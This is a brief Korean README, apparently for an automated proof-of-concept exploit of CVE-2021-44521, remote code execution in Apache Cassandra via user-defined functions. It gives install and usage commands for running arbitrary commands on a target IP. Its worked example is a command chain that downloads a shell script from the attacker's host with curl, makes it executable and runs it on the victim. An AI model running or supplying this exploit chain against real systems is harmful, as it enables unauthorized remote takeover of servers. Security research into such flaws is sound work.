
자동화된 CVE-2021-44521 개념 증명 익스플로잇으로, 사용자 정의 함수를 통해 Apache Cassandra에서 원격 코드 실행을 가능하게 합니다. 대상 IP에서 임의의 명령을 실행합니다.
CVE-2021-44521의 자동화 PoC 원본 PoC 크레딧: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
한 번에 여러 명령을 실행할 수 없으며, 아직 파이프(|)도 사용할 수 없습니다. 따라서 다음과 같이 실행하세요.
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"